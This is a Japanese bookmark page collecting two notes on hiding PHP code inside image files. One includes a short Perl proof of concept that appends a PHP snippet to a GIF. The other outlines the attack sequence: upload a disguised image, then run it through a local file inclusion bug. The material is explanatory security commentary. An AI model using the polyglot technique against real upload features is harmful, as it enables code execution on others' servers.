タグ

関連タグで絞り込む (1)

タグの絞り込みを解除

vulnerabilityとimageに関するshimookaのブックマーク (2)

  • 2007-06-20

    http://isc.sans.org/diary.html?storyid=2997 http://isc.sans.org/diary.html?storyid=3003 ということで http://www.scanit.be/uploads/php-file-upload.pdf これを参考に実験 ってこれはPoC公開? use GD; my $img = new GD::Image(1,1); my $white = $img->colorAllocate(255,255,255); $img->transparent($white); binmode STDOUT; print $img->gif; print '<?php phpinfo() ?>'; これをファイルなり CGIなりで 1.gifを抽出 % ln -s 1.gif 1.php % file 1.gif 1.gi

    2007-06-20
  • 画像ファイルに PHP コードを埋め込む攻撃は既知の問題

    (Last Updated On: 2015年9月10日)国内外のメディアで「画像ファイルに攻撃用のPHPコードが含まれていた」と比較的大きく取り上げられています。しかし、この攻撃手法は古くから知られていた方法です。条件は多少厳しくなりますがPerl, Ruby, Pythonでも同様の攻撃は考えられます。PHPの場合は言語仕様的に他の言語に比べ攻撃が容易です。 典型的な攻撃のシナリオは次の通りです。 追記:Tokenizerを使った例に修正しました。 アバダなどの画像ファイルをアップロードできるサイトを探す ローカルファイルインクルードバグを探す 画像ファイルにサイトが利用している言語のコードを埋め込む 攻撃コードを含んだファイルを画像ファイルとしてアップロードする ローカルファイルインクルードバグを利用して攻撃コードを実行する PHPの場合、リモートインクルードバグを攻撃するための攻撃

    画像ファイルに PHP コードを埋め込む攻撃は既知の問題
  • 1